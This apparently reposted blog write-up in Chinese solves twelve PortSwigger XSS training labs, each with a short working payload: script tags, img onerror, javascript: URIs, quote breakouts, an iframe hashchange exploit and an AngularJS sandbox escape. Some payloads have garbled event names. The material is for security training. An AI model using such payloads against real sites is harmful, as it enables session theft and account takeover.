portswigger靶场XSS攻击实验
作者:互联网
portswigger靶场XSS攻击实验
实验一、没有任何编码的反射型XSS
靶场
说明
This lab contains a simple reflected cross-site scripting vulnerability in the search functionality.
To solve the lab, perform a cross-site scripting attack that calls the alert function.
题解
直接构造最简单的XSS payload
<script>alert%28%29<%2Fscript>
实验二、没有任何编码的存储型XSS
靶场
说明
This lab contains a stored cross-site scripting vulnerability in the comment functionality.
To solve this lab, submit a comment that calls the alert function when the blog post is viewed.
题解
在博客留言下插入最简单的XSS playload,当文章页面时存储型xss就会发挥作用
<script>alert()</script>
实验三、从url获取参数写入DOM的DOM型XSS
使用location.search获得参数、使用document.write重新构建DOM的DOM型XSS
靶场
说明
This lab contains a DOM-based cross-site scripting vulnerability in the search query tracking functionality. It uses the JavaScript document.write function, which writes data out to the page. The document.write function is called with data from location.search, which you can control using the website URL.
To solve this lab, perform a cross-site scripting attack that calls the alert function.
题解
发现用户输入的搜索内容在js代码中会拼接到img标签的src属性中插入DOM节点,使用"闭合src属性,使用>闭合img标签,插入xss代码
search="><script>alert()</script>
实验四、从url获取参数写入innerHtml的DOM型XSS
靶场
说明
This lab contains a DOM-based cross-site scripting vulnerability in the search blog functionality. It uses an innerHTML assignment, which changes the HTML contents of a div element, using data from location.search.
To solve this lab, perform a cross-site scripting attack that calls the alert function.
题解
修改innerHtml时如果直接使用script标签插入xss代码不会自动执行,使用img标签的oerrer事件自动执行xss代码
<img src=2 one rror=alert()>
实验五、使用jQuery选择器修改元素属性的DOM型XSS
靶场
说明
This lab contains a DOM-based cross-site scripting vulnerability in the submit feedback page. It uses the jQuery library's $ selector function to find an anchor element, and changes its href attribute using data from location.search.
To solve this lab, make the "back" link alert document.cookie.
题解
进入Submit feedback页面,发现back按钮是一个a标签,其herf属性是通过js从url的returnPath属性中获取的,修改url,让xss代码自动执行
?returnPath=javascript:alert()
实验六、在jQuery选择器中使用hashchange事件的DOM型XSS
靶场
jquery-selector-hash-change-event
说明
This lab contains a DOM-based cross-site scripting vulnerability on the home page. It uses jQuery's $() selector function to auto-scroll to a given post, whose title is passed via the location.hash property.
To solve the lab, deliver an exploit to the victim that calls the print() function in their browser.
题解
本题没做懂,查看js源代码发现当页面hash值变化时,从页面数据中获取属性值作为jQuery选择器的值,获取到元素后滚动页面到元素,在服务器修改body值并发送数据包到客户端,可以造成页面hash值变化,触发XSS攻击执行print()函数
(官解)在服务器中修改body
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/#" onl oad="this.src+='<img src=x one rror=print()>'"></iframe>
实验七、带尖括号编码的反射型XSS
靶场
attribute-angle-brackets-html-encoded
说明
This lab contains a reflected cross-site scripting vulnerability in the search blog functionality where angle brackets are HTML-encoded. To solve this lab, perform a cross-site scripting attack that injects an attribute and calls the alert function.
题解
本题对尖括号做了编码,观察页面,文本框输入的内容作为input标签的value属性值,使用双引号闭合value属性值,创建鼠标移动事件执行XSS代码,并闭合后面的双引号避免报错
" onm ouseover=alert() a="
实验八、带双引号编码的herf属性存储型XSS
靶场
href-attribute-double-quotes-html-encoded
说明
This lab contains a stored cross-site scripting vulnerability in the comment functionality. To solve this lab, submit a comment that calls the alert function when the comment author name is clicked.
题解
在博客评论中输入的网址会成为a标签herf属性的值
Website:
javascript:alert()
实验九、在js字符串中带尖括号编码的反射型XSS
靶场
javascript-string-angle-brackets-html-encoded
说明
This lab contains a reflected cross-site scripting](https://portswigger.net/web-security/cross-site-scripting/reflected) vulnerability in the search query tracking functionality where angle brackets are encoded. The reflection occurs inside a JavaScript string. To solve this lab, perform a cross-site scripting attack that breaks out of the JavaScript string and calls the `alert` function.
题解
观察页面js代码,使用'闭合字符串,构造新的js语句
';alert();'
实验十、在select元素中的DOM型XSS
靶场
document-write-sink-inside-select-element
说明
This lab contains a DOM-based cross-site scripting vulnerability in the stock checker functionality. It uses the JavaScript document.write function, which writes data out to the page. The document.write function is called with data from location.search which you can control using the website URL. The data is enclosed within a select element.
To solve this lab, perform a cross-site scripting attack that breaks out of the select element and calls the alert function.
题解
观察js代码,接收url中的storeId参数添加到dom中,构造xss代码
storeId=<script>alert()</script>
实验十一、在AngularJS中带尖括号和双引号HTML编码的DOM型XSS
靶场
说明
This lab contains a [DOM-based cross-site scripting](https://portswigger.net/web-security/cross-site-scripting/dom-based) vulnerability in a [AngularJS](https://portswigger.net/web-security/cross-site-scripting/contexts/angularjs-sandbox) expression within the search functionality.
AngularJS is a popular JavaScript library, which scans the contents of HTML nodes containing the `ng-app` attribute (also known as an AngularJS directive). When a directive is added to the HTML code, you can execute JavaScript expressions within double curly braces. This technique is useful when angle brackets are being encoded.
To solve this lab, perform a [cross-site scripting](https://portswigger.net/web-security/cross-site-scripting) attack that executes an AngularJS expression and calls the `alert` function.
题解
AngularJS中使用双括号执行js脚本,constructor构造函数
{{$on.constructor('alert(1)')()}}
实验十二、反射型DOM XSS
靶场
说明
This lab demonstrates a reflected DOM vulnerability. Reflected DOM vulnerabilities occur when the server-side application processes data from a request and echoes the data in the response. A script on the page then processes the reflected data in an unsafe way, ultimately writing it to a dangerous sink.
To solve this lab, create an injection that calls the alert() function.
题解
首先在搜索框中提交搜索,观察页面源代码,在searchResults.js中当接收到服务器响应时执行一个匿名函数
在此函数中eval('var searchResultsObj = ' + this.responseText)使用了eval函数,将响应的数据拼接字符串后执行
标签:XSS,DOM,portswigger,site,lab,cross,靶场,scripting 来源: https://www.cnblogs.com/zhoujinxuan/p/16268862.html